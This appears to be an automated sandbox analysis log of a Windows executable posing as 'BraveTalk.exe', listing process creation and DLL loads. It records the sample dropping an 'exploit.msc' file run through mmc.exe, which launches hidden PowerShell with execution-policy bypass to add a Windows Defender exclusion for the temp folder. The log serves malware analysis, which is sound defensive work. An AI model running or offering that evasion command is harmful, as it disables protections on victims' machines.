Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F662550	0_2_00007FF71F662550
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63B534	0_2_00007FF71F63B534
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6453F0	0_2_00007FF71F6453F0
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F627288	0_2_00007FF71F627288
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63126C	0_2_00007FF71F63126C
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F62A310	0_2_00007FF71F62A310
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F62C2F0	0_2_00007FF71F62C2F0
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F63F180	0_2_00007FF71F63F180
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6421D0	0_2_00007FF71F6421D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAB94447FA	3_2_00007FFAB94447FA

Source: IPt9U27NoX.exe	Binary or memory string: OriginalFilename vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2363014545.00007FF71F68E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000003.1112615894.000001C26ED7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000000.1110976696.00007FF71F68F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000003.1113350610.000001C26F69D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2361260432.000001C26B68D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemmc.exe.muij% vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe, 00000000.00000002.2361260432.000001C26B68D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemmc.exej% vs IPt9U27NoX.exe
Source: IPt9U27NoX.exe	Binary or memory string: OriginalFilenameBraveTalk.exeH( vs IPt9U27NoX.exe

Source: classification engine

Classification label: mal63.evad.winEXE@8/13@1/2

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F62B6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF71F62B6D8

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F648624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF71F648624

Source: C:\Windows\System32\mmc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\MMC

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: IPt9U27NoX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IPt9U27NoX.exe

Virustotal: Detection: 7%

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

File read: C:\Users\user\Desktop\IPt9U27NoX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IPt9U27NoX.exe "C:\Users\user\Desktop\IPt9U27NoX.exe"
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc"
Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc"	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}	Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcndmgr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
